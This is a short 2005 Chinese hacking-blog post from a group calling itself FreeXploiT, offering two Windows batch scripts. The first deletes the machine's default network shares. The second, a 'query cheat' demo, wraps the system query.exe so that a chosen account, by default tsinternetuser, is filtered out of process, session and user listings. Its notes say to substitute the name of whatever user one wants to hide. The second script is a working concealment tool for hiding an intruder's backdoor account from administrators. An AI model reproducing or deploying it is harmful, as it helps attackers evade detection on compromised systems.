Author : ALLyeSNO
Team : FreeXploiT
Date : 2005-07-15
Site : http://blog.csdn.net/freexploit
第一个是删除默认共享用的
第二个是query的欺骗程序演示
sharedelete 0.1
@echo off
cls
title ShareDelete http://blog.csdn.net/freexploit
rem sharedelete 0.1 bulid by ALLyeSNO in China GuangDong ZhuHai
net share ipc$ /delete>nul 2>nul
if exist share.tmp del share.tmp
net share>share.tmp
for /f %%i in (share.tmp) do @net share %%i /delete>nul 2>nul
echo 所有默认共享已经成功删除!
echo.
echo 注意:如果是 XP 和 WIN 2003 操作系统,IPC$ 不可删除.
echo 你可以输入 net share 察看当前默认共享状态.
if exist share.tmp del share.tmp
echo.
echo 请按任意键继续.
pause>nul
echo 输入 exit 退出cmd控制界面
echo.
cd/
%windir%/system32/cmd /k
query cheat 0.1 demo
@echo off
rem query cheat 0.1 demo build by allyesno
rem 使用方法,将tsinternetuser改成你想要隐藏的用户名即可
if /i "%1"=="process" (
if /i "%2"=="tsinternetuser" echo %2 没有进程&&goto end
if /i not "%2"=="" %systemroot%/system32/query.exe process %2&&goto end
%systemroot%/system32/query.exe process>%systemroot%/system32/process.tmp
type %systemroot%/system32/process.tmp|%systemroot%/system32/findstr.exe /i /v "tsinternetuser"
goto end
)
if /i "%1"=="session" (
if /i "%2"=="tsinternetuser" echo %2 没有会话&&goto end
if /i not "%2"=="" %systemroot%/system32/query.exe session %2&&goto end
%systemroot%/system32/query.exe session>%systemroot%/system32/session.tmp
type %systemroot%/system32/session.tmp|%systemroot%/system32/findstr.exe /i /v "tsinternetuser"
goto end
)
if /i "%1"=="user" (
if /i "%2"=="tsinternetuser" echo %2 没有用户&&goto end
if /i not "%2"=="" %systemroot%/system32/query.exe user %2&&goto end
%systemroot%/system32/query.exe user>%systemroot%/system32/user.tmp
type %systemroot%/system32/user.tmp|%systemroot%/system32/findstr.exe /i /v "tsinternetuser"
goto end
)
if /i "%1"=="TERMSERVER" (
%systemroot%/system32/query.exe termserver
goto end
)
if "%1"=="/?" (
echo QUERY { PROCESS ^| SESSION ^| TERMSERVER ^| USER }
goto end
)
:error
echo 无效参数
echo QUERY { PROCESS ^| SESSION ^| TERMSERVER ^| USER }
:end
扫一扫
5401
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
